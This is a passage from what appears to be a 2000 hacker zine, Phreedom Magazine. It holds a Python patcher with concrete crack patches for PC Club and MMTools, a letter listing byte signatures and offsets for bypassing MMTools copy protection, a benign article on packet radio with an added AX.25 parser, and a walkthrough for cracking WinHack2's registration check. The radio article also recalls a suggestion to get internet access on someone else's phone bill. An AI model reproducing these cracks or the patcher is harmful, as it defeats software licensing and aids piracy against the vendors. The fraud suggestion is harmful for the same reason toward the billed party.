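        raise PatchError("signature %s found %d times; refine it" % (signature.hex(), len(hits)))
    for i in hits:
        data = patch_at(data, i, signature, replacement)
    return data, hits


def patch_file(path, patches):
    """Apply ('offset', off, expected, new) and ('sig', signature, new,
    allow_multiple) patches to `path`, keeping the original as path + '.bak'.
    Nothing is written unless every patch verifies."""
    with open(path, "rb") as f:
        data = f.read()
    for p in patches:
        if p[0] == "offset":
            data = patch_at(data, p[1], p[2], p[3])
        elif p[0] == "sig":
            data, _ = patch_signature(data, p[1], p[2], p[3])
        else:
            raise PatchError("unknown patch kind %r" % (p[0],))
    shutil.copyfile(path, path + ".bak")
    with open(path, "wb") as f:
        f.write(data)
    return data


# Constructed stand-ins for the real binaries: the bytes quoted in the
# articles, surrounded by filler.
PCCLUB_SAMPLE = (b"\x00" * 0x10
                 + bytes.fromhex("E809E4FBFF")     # call 00403B68
                 + bytes.fromhex("742B")           # je 0044578C   <- patch target
                 + bytes.fromhex("6A00")           # push 00000000
                 + b"\x00" * 0x10)
PCCLUB_JE_OFFSET = 0x15                            # stands in for 0x44B57

MMTOOLS_SAMPLE = (b"\x90" * 8
                  + bytes.fromhex("813DD09B4500409C00007D05E8CCA6FBFF")   # letter, group B
                  + b"\x90" * 8
                  + bytes.fromhex("8902A1909C4500833800740F")             # letter, group D
                  + b"\x90" * 8)
MMTOOLS_PATCHES = [
    ("sig", bytes.fromhex("409C00007D05"), bytes.fromhex("409C0000EB05"), False),
    ("sig", bytes.fromhex("8902A1909C4500833800740F"), bytes.fromhex("8902A1909C45008338009090"), False),
]


def demo():
    """Apply both kinds of patch to the constructed samples."""
    pcclub = jcc_to_jmp(PCCLUB_SAMPLE, PCCLUB_JE_OFFSET)
    mm = MMTOOLS_SAMPLE
    for _, sig, new, multi in MMTOOLS_PATCHES:
        mm, _ = patch_signature(mm, sig, new, multi)
    return pcclub, mm
```

Against a real file, `patch_file("PCClubRegister.exe", [("offset", 0x44B57, b"\x74\x2B", b"\xEB\x2B")])` does the PC Club patch and keeps a backup; a second run is refused because the bytes are no longer 74 2B, which is exactly the check a hand-edited hex editor session does not give you.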
Then, 11 or 12 bytes back from that instruction, 74h is patched to EBh. Here is the letter itself:

Hi xavier,

this is my research:

1) Enable your error displays by patching physical offset 5560 from FF2570B24500 to 909090909090. The mm initialization code sets the error m to zero !!! So if something happens you don't know what it is! This operation is just to help us crack this babe :)

1.1) I also changed string resources in the exe. As I told you yesterday, some strings can be found at two different offsets. So I changed their names to: IDE1not found, IDE2Notfound, Initialization1error and Initialization2error. Now I will know where the code flows. (My Delphi is installed on the NT and I don't want to install SoftIce over NT. My Win95 and FAT is full with games and there is no space for Delphi there :)) )

2) Remove the IDE check by patching physical offset 48AF5 from 74 to EB. (This operation is necessary for the crack. In general this offset can be easily found from the nearby string.)

The HALT procedure is located at RVA 403808. It is called from

   * Referenced by a CALL at Addresses:
   |:00449011 , :00449137 , :0044919A , :004494F7 , :0044971B
   |:00449D65 , :00449E25 , :00449EC7 , :0044CC22 , :0044CD44
   |:0044CDB7 , :0044CFD7 , :0044EB37 , :0044ED03 , :0044EE4C
   |:0044EEBF , :0044FA6E , :0044FE88 , :0044FFBE , :00450031
   |:00451C53 , :00451D24 , :00451E4E , :00451EC1 , :00458128
   |
   * Referenced by a (U)nconditional or (C)onditional Jump at Address:
   |:0040392E(U)
   |
   :00403808 53                      push ebx

I think only the unconditional jump reference from 0040392E must exist and that all the calls are from the protection scheme.

3) Build a stupid mmkey32.dll (This is necessary for the crack)

   !!!!!!! Strange, but only with these patches your program starts some
   !!!!!!! times. Like the case with the org mmkey32.dll ver 5.0. But
   !!!!!!! maybe with the org version the app would have started more often ...
   !!!!!!! And the other strange thing is that your app has started
   !!!!!!! after the "Initialization failed" message .... :))) I think I'm
   !!!!!!! near ....

4) After I checked *ALL* the addresses that call the exit procedure, I think this procedure is Halt(0), I found the following groups of calls:

A) Call when Delphi is not active, or something else Delphi related
   - from 00449011
   here the proc that checks for Delphi at 00448F5C should be patched.

   :00449001 E856FFFFFF              call 00448F5C
   :00449006 84C0                    test al, al
   :00449008 7407                    je 00449011

   because it can be located easily ... locate 81C4F8FEFFFF6805010000 and change the first 3 bytes to B0FFC3 (mov al,FF ; ret)

B) After a compare of some address with 00009C40, if not greater then exit
   - from 00449137
   - from 0044CD44
   - from 0044EE4C
   - from 0044FFBE
   - from 00451E4E

   :00449124 33C0                    xor eax, eax
   :00449126 A3D09B4500              mov dword ptr [00459BD0], eax
   :0044912B 813DD09B4500409C0000    cmp dword ptr [00459BD0], 00009C40
   :00449135 7D05                    jge 0044913C
   (but how will this be greater? of course, if s.o. else writes meth. at 00459BD0)
   :00449137 E8CCA6FBFF              call 00403808

   these can be located by: 409C00007D05
   and patched to:          409C0000EB05

C) At the end of library loading. I think these are shrinker related
   - from 0044919A
   - from 0044CDB7
   - from 0044EEBF
   - from 00450031
   - from 00451EC1

   **0044919A -> (If the loaded library proc addresses are not like the hardcoded ones)

   :0044918E 813DCC9B450031347D0A    cmp dword ptr [00459BCC], 0A7D3431
   :00449198 7405                    je 0044919F
   :0044919A E869A6FBFF              call 00403808

   * Referenced by a (U)nconditional or (C)onditional Jump at Addresses:
   |:00449180(C), :0044918C(C), :00449198(C)
   |
   :0044919F 803DB4A8450000          cmp byte ptr [0045A8B4], 00
   :004491A6 751D                    jne 004491C5

   * Possible StringData Ref from Code Obj ->"shrink0"
   |
   :004491A8 BA30924400              mov edx, 00449230

   these should be patched. Maybe they are the only ones that should be patched :)) I'm not sure yet ... I think these checks are for the proc addresses of imported procs, and they are hardcoded.

   So these can be located by: 813831347D0A7405
   and should be patched to:   813831347D0AEB05

   Note: I also think that the algorithm for decompressing the shrinked procs should be found here. But I don't care. I'll crack the exe.

D) After unsuccessful calls to an mmxxx32.dll proc
   - from 0044CC22
   - from 0044CFD7
   - from 0044EB37
   - from 0044ED03
   - from 0044FA6E
   - from 0044FE88
   - from 00451C53
   - from 00451D24

   :0044CBFF FFD0                    call eax         (this might be a call to any mmkey32.dll proc)
   :0044CC01 8B15909C4500            mov edx, dword ptr [00459C90]
   :0044CC07 8902                    mov dword ptr [edx], eax
   :0044CC09 A1909C4500              mov eax, dword ptr [00459C90]
   :0044CC0E 833800                  cmp dword ptr [eax], 00000000
   :0044CC11 740F                    je 0044CC22

   these can be located by: 8902A1909C4500833800740F
   and patched to:          8902A1909C45008338009090

E) Exit, called after the "Bad Boy" message dialog, or after an error
   - from 004494F7 - Unable to load library
   - from 0044971B - IDE not found 1
   - from 00449D65 - IDE not found 2
   - from 00449E25 - Evaluation Expired
   these should not be patched

F) The only normal one - at the end of the application
   - from 00458128
   this should not be patched :))))))))

G) Other ...
   - from 00449EC7, there are some winmm.dll calls I don't know. I'll not patch this at this moment

So ... after all these patches and with my silly MMKey32.DLL your program manages to start 20 times out of 20 attempts !!!!! I think the mmtools protection is history now .... :)))

So now it is 00:49 local time and I'll start working on a smart patcher that will detect and correct MMTools proggies.

DaFixer
(C) 2000 Phreedom Magazine


. . . . . . . . . .. . ... . ...............
Wireless/Packet Modems
By ADA
........... . . . . . . . . . . . . . .

From this article you will get information about one method of transmitting data that is not very well known to the wider public.

1) History

In 1979 a group of Canadian radio amateurs (HAMs) used their radios for something other than their standard purpose.
With the help of a device they devised and built themselves, which they call a TNC (Terminal Node Connector), they established a digital link between terminals. This was a definite step forward compared to RTTY (radio teletype), which had been used until then (it is still used today for contests or day to day, but has given way to Packet). You are probably wondering what this Packet is; it is in fact the name of the communication carried out with a TNC and a TX/RX (radio). Its full name is Packet-Radio. The idea of this kind of communication appealed to many HAMs, who are experimenters by nature, and the genie was out of the bottle. In March 1980 US HAMs were given permission to try ASCII communication over a wireless channel. Development began and improved versions of the TNC appeared, namely TNC2, 3 and 4 (in fact they are more firmware fixes than circuit changes). In the US a network from one coast to the other was quickly built, through which radio amateurs could (and still can) carry out digital communication over long distances.

2) Devices

The TNC is usually a box in which the boards implementing the circuits are placed. There is also a ROM with firmware, which is the heart of the TNC. There is also a PAD (Packet Assembler-Disassembler). When data is sent over the serial interface of the computer or terminal (usually RS232), the PAD encapsulates it so that it can be transmitted as discrete signals using radio waves. For this purpose modulation circuits are used, just as in ordinary modems (modulator-demodulator). Here too the variety of modulations is large and depends mainly on the application. In most cases the TNC or packet modem is plugged into the socket where an external microphone (mike) connects to the radio.

This way of connecting is much like those modems that were used many years ago around the world, and here too, where the telephone handset was placed on top of the modem, which had a microphone and a small speaker (there was a film back in the day where I saw what that marvel looks like; of course the user was a hacker, in today's bad sense of the word). The connection is galvanic. Additionally there is a lead that controls the transmit/receive moments, i.e. it sort of presses the transmit button when transmitting and releases it afterwards. The connection described this way uses AFSK (Audio Frequency Shift Keying) modulation. This modulation is obtained by using two basic tones with precisely defined frequencies (I think one of them is 2100Hz). The maximum speed is 2400bps. This speed is low by today's standards, but radio amateurs are not ravenous hyenas for bandwidth and downloads; in most cases they use packet the way 2400 modems were used here back in the day (when they were top technology), for connecting to BBSes and reading mail. I'm starting to think BBSes won't die, they will just transform a little. Of course higher transfer speeds are also possible, for example 9600bps using FSK modulation. However, as the speed goes up quite a few problems arise. Here are some of them:

1) The signal from the microphone output is amplified and therefore distorted (see what LudPhreak wrote in the article in phm#21).

2) Ordinary radios have a fairly large latency, or in simpler terms: at 2400kbps the PushToTalk button is not so sluggish as to create problems, but at 9600+ it already is. What happens is that the transition time OnAir->OffAir and back is large. That is why at 9600+ the radio needs modification, which is within the abilities of some but not of all.

Especially not within the abilities of the kids who have a class D licence and sit on 144MHZ (2m) as if it were IRC, and when they start talking nonsense as in #bulgaria they jam the airwaves in the same way. The consolation is that they only have the legal right to transmit on 2m. Now back to the topic: lately most radio manufacturers put stickers on saying their models can communicate at 9600 without hardware modifications, but as far as I have read this is not entirely true and HAMs have not been rid of this problem (the modification of the TX/RX). I should mention that packet is usually done on the VHF/UHF (UKV) bands, since the necessary signal purity is achieved there. The explanation is: the industrial noise present on the air is usually amplitude noise, and it does not affect a signal transmitted with frequency modulation, FM (since there the amplitude can be limited in the receiver). Things are different with amplitude modulation, AM; here comes the problem with noise, which gets superimposed and creates problems. Also, AM is usually used quite rarely and only for DX (long-distance contacts) on frequencies below 28MHz, and that determines the typical speed for DX packet of 300bps (good thing it isn't 75bps). BTW, I remember that in one of the old issues of PHREEDOM there was a suggestion to do NET on someone else's phone bill with an AM transmitter if you don't want to get caught with the wires at the junction box. At the expense of safety, the link is lousy. By VHF/UHF you should understand the frequencies allocated to HAMs in this range: 144MHZ (2m), 444MHZ (70cm), 1.2GHZ, 5GHZ, 10GHZ (I may have missed a frequency). It should be noted that the higher the transmit frequency, the higher the speed that can be achieved. Not to mention that in the bands above 1GHz the allocated frequency range is measured in hundreds of MHz, while for 2m it is 2Mhz (where quite a few kinds of communication jostle for room).

Also, as the frequency goes up the transmitter power requirements are not great, and even powers of 1W or 0.5W together with suitable antennas give excellent results (bear in mind that for DX you need tens and hundreds of W), but still, at 10GHz the antennas are pointed at each other to reduce losses in the medium. As an example I would give the Slovenian HAMs, S5xxx. Back in 1995/96 they completed the development of devices which, used together, allow speeds of 1.2Mbs. The radios are WideBandFM, their own development (made strictly for packet only). The peculiarity of these radios is that they are greedy for frequency range, but that does not stop them from working on frequencies close to ordinary RX/TX for voice communication. The latter simply don't open their squelch and are not affected. I have information about even higher speeds than this, 10Mbs, and I think the project was called EthernetOnAir. There they work at 10GHZ or more, and these frequencies are not to be underestimated from a physiological point of view, although some say it is harmless because of the low power. Microwave ovens operate at about 2.6GHz and are not safe, but they are of high power. Remarkably or not, it should be said that with the boom in the performance of modern computers it is even possible to make a packet link without a TNC or packet modem. For that you need a sound card (who doesn't have one by now, what with .mp3) and a relatively fast computer (well, not DVD class); the minimum is a 486/66 and I think most of today's machines cover that minimum :). The card's DSP takes care of doing what the PAD does in the TNC. A small problem is the control of the PushToTalk button, which can be solved in several ways, for instance by using the parallel port (if it's free) or the MIDI/Joystick port, which most people don't use, and soon there will be no point in it either, since the runt USB is coming instead of IEEE1394 (FireWire). Yeah, Intel simply has more money and influence than Apple.
When a computer rather than a terminal is used, it is possible to work not with an expensive TNC but with a cheap Packet Modem. The latter, however, requires specialized software and drivers, while the TNC is a purely serial device. The difference between the two devices is like that between an ordinary modem and a software modem. With the packet modem the encapsulation is done in the computer (nowadays fast enough, even too fast) and then the information ready for sending is fed to the packet modem. The TNC encapsulates the data by itself. Looked at one way (and in principle it is so), the packet modem is a component of the TNC. Usually packet modems are G3RUH compatible. G3RUH made a modem with which almost everyone strives to be compatible (I write almost everyone because the Slovenians are an example of such people; they use a modification of a Manchester modem from 2400 to get up to 78k4, at least I think it was that much). Even a 9k6 modem built to G3RUH's design can be "overclocked" (as it's fashionable to say now) to higher speeds; you just need to replace a few components. The modification was made by G3RUH himself, so there are no problems. I think it overclocked to 64kbp/s; if not 64 then 56kbp/s. Packet modems, or wireless modems in general, can be of great use where a cable can't be run and a satellite is respectably expensive. An example of this are the wireless modems of the company DSM-Rousse mentioned by EXo in phm#21. According to the specification they hold a stream of up to 920kbp/s, with line of sight at 60 kilometres without a repeater. Not to mention that, judging by the price I heard of $400 for 2 modems and a router (I explicitly want to say that this is what I learned from the phreedom staff), there is no price list on the web site. In my opinion even certain urban conditions are not a problem (but of course not many buildings). They work at 10GHz. According to S5 their modems with 1W cover 100km line of sight. You should know that a TNC can operate in DIGIPEATER mode, i.e. several linked BBSes can give a HAM from Sofia the possibility to reach Varna without a direct link, but of course the corresponding delays and the greater chance of packet loss with more hops must be taken into account. One TNC in digi mode can maintain several simultaneous connections to its BBS and outwards. One PC can have several modems or TNCs installed, using the PI expansion card or the improved PI2, which also has analogues (in Slovenia). The PI2 card is something like the cards most Bulgarian ISPs use to hook their modems up to the Dial-Up server (digiBoard for example). It requires its own DMA (not sure about IRQ). Back in the day it was sold as a KIT, i.e. do it yourself. But for several years now it hasn't been possible to get such a KIT; it simply isn't produced any more. On the other hand the company PacComm does brisk trade in TNCs and PI2-compatible boards (they pull in good money). The radio amateur LZ1DDD is part of a development group and a big fan of FlexNet. He is currently making a PCI card with a packet modem allowing speeds up to 76k8 and a radio in one, which is quite a good solution. Such a card, but ISA, is sold by MiroSystems Varna (I'm not advertising anyone, just giving examples). The latter has a more or less fixed range; I think it uses crystals, hmm, well what else but crystals. The price is around $100. It doesn't look impeccable, but it works. BTW, if anyone has problems building a PIC programmer you can buy a board with the traces from him, on which to stick all the components. On LZ1DDD's web page (www.qsl.net/lz1ddd/) there is a schematic of a small (the size of 2 matchboxes) packet modem.

3) Software

The link-layer protocol on which packet works is AX.25. This is a modified X.25, in connection with the information being transmitted over radio waves, but not only because of that. In the beginning it was used for access to large machines (IBM) from terminals, and in this way it gave the possibility to work with centralized computing power. AX.25 is not weak, but of course you know that TCP/IP is better known and used everywhere. HAMs, besides being "hardware guys", also write programs, even whole (small) OSes (programs) for the needs of packet transmission, for example JNOS (the most popular), TNOS. First NET was written, then it changed into NOS. The latter has many modifications, two of which I mentioned. With the wide adoption of Linux and the great support this OS has, it came to fully support AX.25 (as well as many other data transmission protocols). Everything is simple: you compile the kernel with AX.25 support and that's the greater part of it; the rest you know, 'route' settings and others (for more information, AX_25.howto). The problem is different: working with AX.25 is hard and unproductive. That's why, at least for now for Windows, and maybe in the future for Linux too, there is an implementation of a TCP/IP stack over AX.25 (i.e. again an AX.25 stack), with which things fall into place. With a packet modem and a BBS with an Internet connection you may no longer depend on BTC, at least for pumping a small amount of mail or chat in unloaded IRC channels, and even ICQ. And this TCP/IP stack is quite stable. More stable than the Windows one. It's called FlexNet (www.flexnet.de) and was created by Germans. FlexNet was created because the existing implementation of communication between AX.25 and applications was WA8DED's hostmode, but the latter is: slow, hard for programmers to use, not transparent (you can't use TCP/IP with it). FlexNet is a revolutionary product, not an evolutionary one. It is installed the way you add the M$ TCP/IP protocol, from the Control Panel. For more information look at the web site. BTW, the "standard" for packet modems (as far as there can be a standard), or more precisely the most common design, belongs to the Germans.
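As an added illustration of the AX.25 framing this section refers to (example code written for this edition, not part of ADA's article or of any of the packet software it names): a minimal builder and parser for AX.25 UI frames. It assumes the AX.25 v2 on-air layout (7-byte address fields with the callsign characters shifted left by one bit, the 0x03 control byte of a UI frame, a PID byte, and a CRC-16/X-25 FCS appended least-significant byte first); the HDLC flags and bit-stuffing that surround a frame on the radio are not modelled, and the callsigns and payload are constructed sample data. The defender's point is in the parser: verify the FCS and bound the walk over address fields before trusting anything in a frame that arrived over an open radio channel.

```python
"""AX.25 UI frame builder/parser (added example; assumptions noted inline)."""
import re

UI_CONTROL = 0x03          # control byte of an unnumbered information (UI) frame
PID_NO_L3 = 0xF0           # PID: no layer-3 protocol
MAX_ADDRESS_FIELDS = 10    # destination + source + up to 8 digipeaters (AX.25 v2)


def ax25_fcs(data: bytes) -> int:
    """CRC-16/X-25 as used for the HDLC FCS: poly 0x1021 reflected (0x8408),
    init 0xFFFF, final XOR 0xFFFF.  The check value for b"123456789" is 0x906E."""
    crc = 0xFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0x8408 if crc & 1 else crc >> 1
    return crc ^ 0xFFFF


def _encode_address(callsign: str, ssid: int, last: bool) -> bytes:
    """Pack one 7-byte address field: 6 shifted callsign chars + SSID byte."""
    if not 0 <= ssid <= 15:
        raise ValueError("SSID must be 0..15")
    call = callsign.upper().ljust(6)
    if len(call) != 6 or not call.isascii():
        raise ValueError("callsign must be 1..6 ASCII characters")
    field = bytearray((ord(ch) << 1) & 0xFF for ch in call)
    ssid_byte = 0x60 | (ssid << 1)      # reserved bits 6-5 set, C/H bit (bit 7) clear
    if last:
        ssid_byte |= 0x01               # address extension bit: no more fields follow
    field.append(ssid_byte)
    return bytes(field)


def _decode_address(field: bytes):
    """Unpack one 7-byte address field -> (callsign, ssid, is_last)."""
    call = "".join(chr(b >> 1) for b in field[:6]).rstrip()
    ssid = (field[6] >> 1) & 0x0F
    return call, ssid, bool(field[6] & 0x01)


def build_ui_frame(dst, src, digipeaters=(), info=b"", pid=PID_NO_L3) -> bytes:
    """dst/src/digipeaters are (callsign, ssid) tuples; returns the frame with FCS."""
    fields = [dst, src, *digipeaters]
    if len(fields) > MAX_ADDRESS_FIELDS:
        raise ValueError("at most 8 digipeaters allowed")
    body = bytearray()
    for i, (call, ssid) in enumerate(fields):
        body += _encode_address(call, ssid, last=(i == len(fields) - 1))
    body += bytes([UI_CONTROL, pid]) + bytes(info)
    return bytes(body) + ax25_fcs(body).to_bytes(2, "little")


def parse_ui_frame(frame: bytes) -> dict:
    """Validate and decode a UI frame; raises ValueError on anything malformed."""
    if len(frame) < 2 * 7 + 2 + 2:               # two addresses, control, PID, FCS
        raise ValueError("frame too short")
    body, fcs_field = frame[:-2], int.from_bytes(frame[-2:], "little")
    if ax25_fcs(body) != fcs_field:
        raise ValueError("FCS mismatch (corrupted or forged frame)")
    addresses, pos, last = [], 0, False
    while not last:                                # bounded walk over address fields
        if len(addresses) == MAX_ADDRESS_FIELDS:
            raise ValueError("too many address fields")
        field = body[pos:pos + 7]
        if len(field) < 7:
            raise ValueError("truncated address field")
        call, ssid, last = _decode_address(field)
        addresses.append((call, ssid))
        pos += 7
    if len(body) < pos + 2:
        raise ValueError("missing control/PID")
    if body[pos] != UI_CONTROL:
        raise ValueError("not a UI frame")
    return {"dst": addresses[0], "src": addresses[1], "digipeaters": addresses[2:],
            "pid": body[pos + 1], "info": bytes(body[pos + 2:])}


def is_valid_ui_frame(frame: bytes) -> bool:
    try:
        parse_ui_frame(frame)
        return True
    except ValueError:
        return False


# Bulgarian callsigns are LZxYYY (a digit, then letters; two letters for old licences).
LZ_CALLSIGN = re.compile(r"^LZ\d[A-Z]{2,3}$")


def is_bulgarian_callsign(call: str) -> bool:
    return bool(LZ_CALLSIGN.match(call.upper()))


# Constructed sample: a UI frame to LZ1DDD from the made-up station LZ2ABC-1 via one digipeater.
SAMPLE_FRAME = build_ui_frame(("LZ1DDD", 0), ("LZ2ABC", 1), [("BBS", 5)], b"hello via digi")

if __name__ == "__main__":
    print(SAMPLE_FRAME.hex())
    print(parse_ui_frame(SAMPLE_FRAME))
```

The builder and parser share one address encoder, so a frame round-trips exactly; a single flipped bit or a truncated frame is rejected by the FCS check rather than being decoded into a plausible-looking callsign.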
In practice anyone can assemble and even devise a modem; they just need deep knowledge of circuit design (especially digital), and there are such people. For almost all OSes there are packet BBSes. A packet BBS can even be used as a gateway to the Internet (this is not very surprising). Most of them are accessible from the Internet (via telnet for example). You just need to use a callsign when logging in. Bulgarian callsigns are of the form LZxYYY, where x is a digit and YYY are letters. Of course there are also callsigns with 2 letters; they belong to old HAMs. Whether X is even or odd tells you where the HAM lives, in Northern or Southern Bulgaria. If you have never been on a given BBS it gives you the possibility to choose a password, and with that the creation of the account is basically finished. Most of the BBSes are in the ampr.org domain. For the needs of ampr.org a Class A network of IP addresses, 44.XXX.YYY.ZZZ, has been provided. Bulgaria has been allocated a Class B network (44.185/16). I especially want to say that the Americans have again done well for themselves, because there every state has a Class B network or cities have their own, whereas there are countries with Class C networks (the countries of the former USSR).

4) Conclusion

In conclusion I want to say that Wireless/Packet modems are a good thing, but one problem remains: they are complicated enough for the average, and below-average, computer guy, who easily learns how to fiddle with WinXXYY (two X and 2 Y chromosomes :) ), but won't be able to build the modem. And factory-made it comes at quite a respectable price. I hope it was interesting for you. If any questions arise, ask on the msg.board and you will surely be answered. zZzZzzzzZZZZZZZZ ..... in the silence Breadfan is faintly heard.

ADA (C) 2000 Phreedom Magazine

. . . . . . . . . .. . ... . ...............
Cracking WinHack2                  By DaFixer
........... . . . . . . . . . . . . . .
Target: WinHack2.exe (456 192 bytes, 16.05.1999, 19:50:14)
        http://www.malinverni.com/download/down.asp?program=WH200.zip

Tools:
  shrunp.exe - Deshrinker by Andrew Shipinsky
               http://156.17.4.138/~mwd/playtools/exe-ud.html
  DeDe (c) by DaFixer
               http://www.phreedom.org/ftparea/windows/DeDe/
  RegMon       http://www.sysinternals.com/regmon.htm
  FileMon      http://www.sysinternals.com/filemon.htm
  W32DASM
  Your favorite HEX editor (i.e. HEXWorkShop)

So this business with the WinHack 2.0 in question definitely intrigued me and I decided to check what it was all about. After I downloaded and installed the baby, the first job was to check what the little bytes in the exe looked like :) I opened Winhack2.exe with HWS (HexWorkShop) and what did I see! It turned out the baby was lightly encrypted with Shrinker. Well, let's correct that. First, of course, I tried to dump it with ProcDump, but it resisted. Then to decrypt it, again with ProcDump, but it resisted again. In the end I got fed up and just used good old "shrunp". It showed no complications. After the new check of the little bytes, what did I see: Boolean .. False and so on. He he, my favourite, a Delphi program. This only made me keener to operate on it and remove its little bugs. Finally I ran it! There were no nag screens. (maybe this bores you, but really it's the first time I've run this program!). So I found the Register menu and clicked it. A ShowMessage() popped up saying my serial number was #$%&-#$@$%@@. Fine. But then an InputQuery() popped up asking for the reg number. Well, I put in something for a reg number. After the OK, though, I was surprised. I almost thought the baby was fooled when instead of "This #$%%$%^^ is invalid" I got the message that I had to restart WinHack. Hmmm .... things don't look like they'll be easy. Well, let's check what the baby looks like without its pants :) First I disassembled it with W32DASM and then ran DeDe too. Instead you could use, say, exe2drp (if you've cracked it), but DeDe has greater capabilities.

So after I opened the Delphi workspace generated by DeDe, the first thing that struck me was that I hadn't seen one of the forms in the program. It was for registration. It seems the guys who made the baby changed their protection scheme. Then I noticed other interesting things, like the TExeImage class for example. Hmm ... But what I opened the project for was to find out the RVA of that menu. Well, it had a handler named MM_Help_RegisterClick, located at address 0048991C. Besides that I noted the Form1.OnCreate address: 00481144. Let's see what it's about: (this is a little after the start of TForm1.OnCreate)

:0048116C A158D34800              mov eax, dword ptr [0048D358]
:00481171 E8B628F8FF              call 00403A2C
:00481176 8B8670020000            mov eax, dword ptr [esi+00000270]
:0048117C E83342FFFF              call 004753B4
:00481181 84C0                    test al, al
:00481183 741F                    je 004811A4

* Possible StringData Ref from Code Obj ->"Created By: YourName Here"
|
:00481185 BAE8134800              mov edx, 004813E8
:0048118A 8B8640050000            mov eax, dword ptr [esi+00000540]
:00481190 E89FD7F9FF              call 0041E934
:00481195 B201                    mov dl, 01
:00481197 8B8640050000            mov eax, dword ptr [esi+00000540]
:0048119D E8FAD6F9FF              call 0041E89C
:004811A2 EB1D                    jmp 004811C1

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00481183(C)
|
* Possible StringData Ref from Code Obj ->"Created By: Unregistered version "
                                        ->"of WinHack v2.00"
|
:004811A4 BA0C144800              mov edx, 0048140C

I wonder what this little procedure at 004753B4 does. Given the string references, its original name is probably something like: function IsThisABadGuy(), and when I looked at it! horror! 15 references:

* Referenced by a CALL at Addresses:
|:0048117C , :00484458 , :0048733A , :0048751E , :00487875
|:00487B6C , :00487F3C , :004880BC , :0048969E , :004899BF
|:004899F2 , :00489B5C , :00489BA1 , :00489E3F , :00489E67
|
:004753B4 55                      push ebp

Scrolling down, it turned out this animal is pretty big. Well, finally I reached its end:

:0047574F 8BC3                    mov eax, ebx
:00475751 5F                      pop edi
:00475752 5E                      pop esi
:00475753 5B                      pop ebx
:00475754 8BE5                    mov esp, ebp
:00475756 5D                      pop ebp
:00475757 C3                      ret

:0047574F 8BC3                    mov eax, ebx

So why should we let all sorts of unknown values, like ebx for instance, be stuffed into eax at 0047574F, when we can stuff in, say, a -1, answering IsThisABadGuy? firmly with False :) So let's replace:

B8C3    mov eax, ebx

with this:

B0FF    mov al, FF

Now let's look at the baby. When we run it we notice the register menu is gone. We also notice the baby vanishes into oblivion after about 3 sec. It seems it doesn't like us changing its little bytes :)) Well, it looks like it's time to do some spying ... So let's run the spy programs: RegMon and FileMon by NT Internals. What's noticeable in its REG behaviour is that it looks for some:

HKLM\Software\Microsoft\ActiveObject\{486E6957-766B6361-20303032}\{74793433-33746833-33326834-39386E76-2020742D}   NOTFOUND
HKLM\Software\Microsoft\ActiveObject\{486E6957-766B6361-20303032}\{57505934-54383445-792D796E-79353477}            NOTFOUND

And in its FILE behaviour even stranger things are noticeable: every 4 sec or so some m.dmp gets written to C:\. Well fine, after all this may be related to the specifics of the program itself. The interesting thing is that the version with the changed little bytes lasts only until the first write to m.dmp, and it made a dump there by itself :) but it does it somewhat scrambled.
After checking the string references to m.dmp it turned out that the only procedure in which m.dmp is referenced 2 times has address 004743AC and is called from the following 2 places:

* Referenced by a CALL at Addresses:
|:00472DD2 , :00473B9C
|
:004743AC 55                      push ebp

The first of them is:

:00472D9C 53                      push ebx
:00472D9D 56                      push esi
:00472D9E BE087A4D00              mov esi, 004D7A08
:00472DA3 C605FC794D0000          mov byte ptr [004D79FC], 00
:00472DAA C605047A4D0001          mov byte ptr [004D7A04], 01
:00472DB1 EB40                    jmp 00472DF3

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00472DFA(C)
|
:00472DB3 C605187A4D0001          mov byte ptr [004D7A18], 01
:00472DBA 830601                  add dword ptr [esi], 00000001

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00472D52(C)
|
:00472DBD 7105                    jno 00472DC4
:00472DBF E86000F9FF              call 00402E24

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00472DBD(C)
|
:00472DC4 833E09                  cmp dword ptr [esi], 00000009
:00472DC7 7C20                    jl 00472DE9
:00472DC9 33C0                    xor eax, eax
:00472DCB 8906                    mov dword ptr [esi], eax
:00472DCD BBDCCC4800              mov ebx, 0048CCDC
:00472DD2 E8D5150000              call 004743AC
:00472DD7 3B03                    cmp eax, dword ptr [ebx]
:00472DD9 740E                    je 00472DE9
:00472DDB C605FC794D0001          mov byte ptr [004D79FC], 01
:00472DE2 C605057A4D0001          mov byte ptr [004D7A05], 01

* Referenced by a (U)nconditional or (C)onditional Jump at Addresses:
|:00472DC7(C), :00472DD9(C)
|
:00472DE9 68F4010000              push 000001F4

* Reference To: kernel32.Sleep, Ord:0000h
|
:00472DEE E84D2EF9FF              Call 00405C40

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00472DB1(U)
|
:00472DF3 803D057A4D0000          cmp byte ptr [004D7A05], 00

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00472D93(C)
|
:00472DFA 74B7                    je 00472DB3
:00472DFC C605047A4D0000          mov byte ptr [004D7A04], 00
:00472E03 803DFC794D0000          cmp byte ptr [004D79FC], 00
:00472E0A 7407                    je 00472E13
:00472E0C 33C0                    xor eax, eax
:00472E0E E8850BF9FF              call 00403998

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00472E0A(C)
|
:00472E13 33DB                    xor ebx, ebx
:00472E15 A1F8794D00              mov eax, dword ptr [004D79F8]
:00472E1A 50                      push eax

* Reference To: kernel32.CloseHandle, Ord:0000h
|
:00472E1B E8202CF9FF              Call 00405A40
:00472E20 8BC3                    mov eax, ebx
:00472E22 5E                      pop esi
:00472E23 5B                      pop ebx
:00472E24 C3                      ret

And the second is:

:00473B70 53                      push ebx
:00473B71 80782A01                cmp byte ptr [eax+2A], 01
:00473B75 754F                    jne 00473BC6
:00473B77 803D187A4D0000          cmp byte ptr [004D7A18], 00
:00473B7E 7546                    jne 00473BC6
:00473B80 83051C7A4D0001          add dword ptr [004D7A1C], 00000001
:00473B87 7105                    jno 00473B8E
:00473B89 E896F2F8FF              call 00402E24

* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:00473B87(C)
|
:00473B8E 833D1C7A4D0014          cmp dword ptr [004D7A1C], 00000014
:00473B95 7E36                    jle 00473BCD
:00473B97 BBDCCC4800              mov ebx, 0048CCDC
:00473B9C E80B080000              call 004743AC
:00473BA1 3B03                    cmp eax, dword ptr [ebx]
:00473BA3 7428                    je 00473BCD
:00473BA5 C605FC794D0001          mov byte ptr [004D79FC], 01

